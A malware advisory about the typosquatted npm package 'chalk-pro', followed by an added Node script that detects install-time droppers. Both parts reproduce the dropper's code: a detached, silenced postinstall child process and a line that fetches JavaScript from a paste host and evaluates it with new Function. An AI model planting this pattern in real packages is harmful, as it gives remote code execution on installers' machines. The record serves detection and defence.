Vulnerability
Malicious code in chalk-pro (npm)
Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)

The package is published as 'chalk-pro' (homepage chalk-pro.com), but its main entry is a verbatim copy of nodemailer's API, and 'Andris Reinman' (the real nodemailer author) is listed as author. It is a typosquat that borrows credibility from both chalk and nodemailer.

The package.json postinstall hook runs `node lib/utils/index.js`. That file calls `child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] })` followed by `child.unref()` to launch `lib/utils/smtp-connection/index.js` as a detached child with all three standard streams discarded. Because the parent does not wait on an unref'd detached child, `npm install` returns immediately and shows no output while the dropper keeps running in the background, inheriting the installing user's environment.

The dropper executes `require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require))`: it fetches attacker-controlled JavaScript from a mutable paste host and evaluates it with `new Function` at install time, passing in `require` so the fetched code has the full Node module system and runs with the installing user's privileges. Because the paste is mutable, the payload can be changed or withdrawn at any time, so what a given install received cannot be inferred from the package contents alone.

A second file, `lib/utils/smtp-connection/parse.js`, implements AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex.

This is a classic install-time dropper: typosquat lure, detached and silenced postinstall, remote eval from a mutable third-party paste, and a bundled second-stage decryptor.
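The following Node script is an added example (not code from the advisory, from Amazon Inspector, or from the chalk-pro package) that triages an unpacked npm package for the four traits described above: an install lifecycle hook, a detached and silenced child process, an HTTP fetch feeding `new Function`/`eval`, and an AES decryptor with literal key material. The fixtures are constructed from the advisory's description rather than copied from the package, and the paste URL in them is a placeholder.

```javascript
'use strict';
// Added example, not code from the advisory or the chalk-pro package.
// Static triage of an unpacked npm package for the install-time dropper shape:
// lifecycle hook + detached/silenced child + remote fetch into a code sink +
// bundled decryptor with literal key material. Input is a map of
// relative path -> file text, so it runs offline.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Per-file pattern detectors; each `test` receives the file's source text.
const DETECTORS = [
  {
    kind: 'detached-silenced-child',
    // spawn/fork/exec with detached:true plus unref(): the child outlives
    // `npm install` and the parent does not wait for it.
    test: (src) =>
      /\b(spawn|fork|exec|execFile)\s*\(/.test(src) &&
      /detached\s*:\s*true/.test(src) &&
      /\.unref\s*\(\s*\)/.test(src),
  },
  {
    kind: 'remote-eval',
    // An HTTP GET (axios/https/fetch style) in the same file as a dynamic
    // code sink: new Function, eval, or vm.run*.
    test: (src) =>
      /(\.get|\bfetch)\s*\(\s*['"`]https?:\/\//.test(src) &&
      /\bnew\s+Function\s*\(|\beval\s*\(|\bvm\.run\w*\s*\(/.test(src),
  },
  {
    kind: 'hardcoded-symmetric-key',
    // AES decryptor whose key/IV are hex literals in the source.
    test: (src) =>
      /createDecipheriv\s*\(\s*['"]aes-\d{3}-\w+['"]/.test(src) &&
      /Buffer\.from\s*\(\s*['"][0-9a-fA-F]{32,}['"]\s*,\s*['"]hex['"]\s*\)/.test(src),
  },
];

// Returns a list of { kind, file, detail? } findings for one package.
function scanPackage(files) {
  const findings = [];
  let pkg = {};
  try { pkg = JSON.parse(files['package.json'] || '{}'); } catch (e) { pkg = {}; }
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ kind: 'lifecycle-hook', file: 'package.json', detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(files)) {
    if (!/\.[cm]?js$/.test(file)) continue;
    for (const d of DETECTORS) {
      if (d.test(src)) findings.push({ kind: d.kind, file });
    }
  }
  return findings;
}

// A hook alone is common in legitimate packages; a hook combined with an
// execution/fetch pattern is the dropper shape and should block the install.
function verdict(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  const exec = kinds.has('detached-silenced-child') || kinds.has('remote-eval');
  if (kinds.has('lifecycle-hook') && exec) return 'block';
  if (exec || kinds.has('hardcoded-symmetric-key')) return 'review';
  return 'pass';
}

// Reads an unpacked package directory (e.g. node_modules/<name>) into the map.
function readPackageDir(root) {
  const fs = require('fs');
  const path = require('path');
  const files = {};
  (function walk(dir) {
    for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
      const p = path.join(dir, ent.name);
      if (ent.isDirectory()) { if (ent.name !== 'node_modules') walk(p); continue; }
      files[path.relative(root, p).split(path.sep).join('/')] = fs.readFileSync(p, 'utf8');
    }
  })(root);
  return files;
}

// Constructed fixture modelled on the advisory's description (placeholder URL and key material).
const SUSPECT = {
  'package.json': JSON.stringify({
    name: 'chalk-pro', version: '1.0.0', author: 'Andris Reinman',
    scripts: { postinstall: 'node lib/utils/index.js' },
  }),
  'lib/utils/index.js': `
    const { spawn } = require('child_process');
    const path = require('path');
    const filePath = path.join(__dirname, 'smtp-connection', 'index.js');
    const child = spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore', 'ignore', 'ignore'] });
    child.unref();`,
  'lib/utils/smtp-connection/index.js': `
    require('axios').get('https://paste.example/b/STAGE').then(r => new Function('require', r.data.cookie)(require));`,
  'lib/utils/smtp-connection/parse.js': `
    const crypto = require('crypto');
    module.exports = (hex) => {
      const d = crypto.createDecipheriv('aes-256-cbc',
        Buffer.from('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef', 'hex'),
        Buffer.from('00112233445566778899aabbccddeeff', 'hex'));
      return Buffer.concat([d.update(Buffer.from(hex, 'hex')), d.final()]).toString();
    };`,
};

// Constructed benign fixture: a test script is not an install hook.
const BENIGN = {
  'package.json': JSON.stringify({ name: 'pad-left-ish', version: '1.0.0', scripts: { test: 'node test.js' } }),
  'index.js': 'module.exports = (s, n) => s.padStart(n);',
};

if (typeof require === 'function' && require.main === module) {
  const files = process.argv[2] ? readPackageDir(process.argv[2]) : SUSPECT;
  const findings = scanPackage(files);
  console.log(JSON.stringify({ verdict: verdict(findings), findings }, null, 2));
}
```

Run it as `node scan.js ./node_modules/chalk-pro` after fetching the package with lifecycle scripts disabled (`npm install --ignore-scripts`), so the postinstall never fires before triage. The regexes are deliberately loose pattern checks, not a parser: a `lifecycle-hook` finding on its own is routine for packages with native builds, which is why `verdict` only blocks when a hook coincides with a detached child or a fetch-to-eval sink.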
Scoring: no CVSS base score from NVD or GHSA and no EPSS score from FIRST.org at the time of this record. Interim severity label, derived from the absence of KEV/exploitation signals and an EPSS percentile rather than from the package behaviour: No exploitation, limited impact or prevalence. For a malicious package these feeds are a weak signal; the install-time remote code execution described above is the operative risk regardless of the label.